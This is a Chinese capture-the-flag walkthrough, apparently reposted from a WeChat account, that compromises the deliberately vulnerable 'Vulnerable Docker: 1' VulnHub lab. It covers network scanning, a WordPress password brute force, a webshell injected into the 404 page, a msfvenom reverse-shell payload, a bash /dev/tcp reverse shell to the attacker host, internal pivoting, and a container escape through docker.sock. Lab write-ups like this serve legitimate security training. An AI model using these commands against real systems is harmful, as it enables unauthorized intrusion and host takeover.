vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

虚拟机信息：

虚拟机下载地址：https://www.vulnhub.com/entry/vulnerable-docker-1,208/

虚拟机简介：2 种模式：

• ✅困难：这需要您结合您的 docker 技能以及您的渗透测试技能来实现主机妥协。

• ✅简单：相对简单的路径，知道 docker 就足以破坏机器并在主机上获得 root

目标：2个flag（flag_1 和 flag_3），在主机上获得 id=0 shell 访问权限

级别：简单/中级

1.1 信息收集

在主机开启时，需要选择Hard模式

1.主机信息收集

arp-scan 192.168.207.0/24

nmap -A -sS -sV -v -p- 192.168.207.129

查看开放22和8000端口，并且发现wp-admin页面

2.WEB渗透测试

wpscan --url "http://192.168.207.129:8000" -eu

获取到用户名微bob

cd /usr/share/wordlists
git clone https://github.com/danielmiessler/SecLists.git
wpscan --url "http://192.168.207.129:8000/" -U bob -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-100000.txt

获取到用户名为bob，密码为Welcome1

登录账号后发现flag_1信息

use exploit/unix/webapp/wp_admin_shell_upload
set USERNAME bob
set PASSWORD Welcome1
set RHOST 192.168.207.129
set RPORT 8000
run

通过编辑404页面，插入冰蝎webshell

使用冰蝎进行连接

http://192.168.207.129:8000/wp-content/themes/twentyseventeen/404.php

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.207.130 LPORT=4444 -f elf > payload

upload /root/payload /tmp/payload

通过冰蝎修改权限

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.207.130
set lport 4444
run -j

执行命令

execute -f /tmp/payload

获取到会话

查看会话信息

run post/multi/manage/autoroute

3.内网横向

use auxiliary/scanner/portscan/tcp
set rhosts 172.18.0.0/24
set timeout 100
set threads 100
set concurrency 100
run

其中发现有22端口和一些其他端口，也发现有8022端口

使用端口转发其他主机的8022端口到本地

portfwd add -l 8022 -p 8022 -r 172.18.0.3

访问转发端口，发现为docker的SSH

bash -i >& /dev/tcp/192.168.207.130/5555 0>&1

由于机器假死，重新导入虚拟机后IP地址变了

 cd /var/run
 ls -lah

这个容器docker.sock允许与 docker 通信，意味着可以创建、添加、删除容器

由于机器中无相关命令，需要安装相关软件

apt update
apt install python docker wget

如果docker无法安装成功，可以通过在其他主机上复制docker二进制文件，并下载到容器中

python -c 'import pty; pty.spawn("/bin/bash")' 
./docker run -it -v /:/host ubuntu bash
cd /host

原文始发于微信公众号（安全孺子牛）：vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式